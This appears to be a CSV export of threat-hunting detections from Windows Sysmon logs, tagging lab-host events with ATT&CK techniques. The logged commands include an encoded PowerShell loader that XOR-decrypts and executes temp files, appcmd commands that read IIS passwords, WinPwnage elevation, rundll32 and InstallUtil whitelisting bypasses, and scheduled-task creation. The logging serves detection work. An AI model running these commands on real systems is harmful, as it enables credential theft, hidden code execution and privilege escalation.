JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1557621150.227012,2019-05-12T04:32:30.227012+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator ),1," 1 5 4 1 0 0x8000000000000000 16243 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 00:32:30.023 365ABB72-699E-5CD7-0000-001073582200 3876 C:\Windows\System32\schtasks.exe 6.1.7600.16385 (win7_rtm.090713-1255) Manages scheduled tasks Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\schtasks.exe" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-5DEC-5CD7-0000-00204A380100 0x1384a 1 High SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 365ABB72-6998-5CD7-0000-00104E422200 2740 C:\Python27\python.exe python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558969958.290374,2019-05-27T19:12:38.290374+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c whoami /groups ),1," 1 5 4 1 0 0x8000000000000000 6168 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:38.231 365ABB72-FE66-5CEB-0000-001058F50B00 3256 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c whoami /groups C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-FD85-5CEB-0000-00104C0E0B00 1944 C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit)",1," 1 5 4 1 0 0x8000000000000000 556863 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-08-07 23:33:08.339 747F3D96-1834-610F-0000-00105FE5D300 6576 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1231-610F-0000-002057A80700 0x7a857 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-182D-610F-0000-00106F40D300 9932 C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1," 1 5 4 1 0 0x8000000000000000 556863 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-08-07 23:33:08.339 747F3D96-1834-610F-0000-00105FE5D300 6576 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1231-610F-0000-002057A80700 0x7a857 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-182D-610F-0000-00106F40D300 9932 C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1628379191.072445,2021-08-08T03:33:11.072445+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit )",1," 1 5 4 1 0 0x8000000000000000 556863 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-08-07 23:33:08.339 747F3D96-1834-610F-0000-00105FE5D300 6576 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" c:\users\public\memViewData.jpg,PluginInit C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1231-610F-0000-002057A80700 0x7a857 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-182D-610F-0000-00106F40D300 9932 C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920559.784314,2019-05-27T05:29:19.784314+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password ),1," 1 5 4 1 0 0x8000000000000000 5967 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:19.714 365ABB72-3D6F-5CEB-0000-0010F2CFFF00 3844 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1589239346.761944,2020-05-12T03:22:26.761944+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," 1 5 4 1 0 0x8000000000000000 142033 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-11 23:22:26.451 747F3D96-DE32-5EB9-0000-00103FC14300 5252 C:\Windows\System32\svchost.exe 10.0.17763.1 (WinBuild.160101.0800) Host Process for Windows Services Microsoft® Windows® Operating System Microsoft Corporation svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-5461-5EBA-0000-0020E7030000 0x3e7 0 System SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 00000000-0000-0000-0000-000000000000 580 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5435 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 12:06:55.471 747F3D96-78DF-5D45-0000-0010EF400401 4320 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020B3D31800 0x18d3b3 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-78DF-5D45-0000-0010BD350401 5756 C:\Windows\System32\Dism.exe "C:\Windows\system32\dism.exe" /online /norestart /apply-unattend:"C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1628379182.783518,2021-08-08T03:33:02.783518+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," 1 5 4 1 0 0x8000000000000000 556726 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-08-07 23:33:01.121 747F3D96-182D-610F-0000-00100344D300 11196 C:\Windows\System32\svchost.exe 10.0.17763.1 (WinBuild.160101.0800) Host Process for Windows Services Microsoft® Windows® Operating System Microsoft Corporation svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost C:\Windows\system32\ NT AUTHORITY\LOCAL SERVICE 747F3D96-90AF-610F-0000-0020E5030000 0x3e5 0 System SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 00000000-0000-0000-0000-000000000000 632 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1603490287.601524,2020-10-24T01:58:07.601524+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\schtasks.exe ) through command line ( schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1," 1 5 4 1 0 0x8000000000000000 424079 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:57:36.627 747F3D96-51D0-5F93-0000-001079C05B00 8572 C:\Windows\SysWOW64\schtasks.exe 10.0.17763.1 (WinBuild.160101.0800) Task Scheduler Configuration Tool Microsoft® Windows® Operating System Microsoft Corporation schtasks.exe schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers C:\Users\IEUser\AppData\Local\Temp\tmp1375\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002085A50800 0x8a585 1 High SHA1=77F125CE5840293890E1359483C7104AADE25FA7,MD5=5BD86A7193D38880F339D4AFB1F9B63A,SHA256=72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH=012D1B3C5FD8B10F0F36DB7243A28CB8 747F3D96-51D0-5F93-0000-0010B2B35B00 5572 C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564435988.318896,2019-07-30T01:33:08.318896+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4897 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:08.174 747F3D96-6614-5D3F-0000-001093CE8600 108 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920559.563997,2019-05-27T05:29:19.563997+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName ),1," 1 5 4 1 0 0x8000000000000000 5964 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:19.513 365ABB72-3D6F-5CEB-0000-0010CFCAFF00 3892 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAF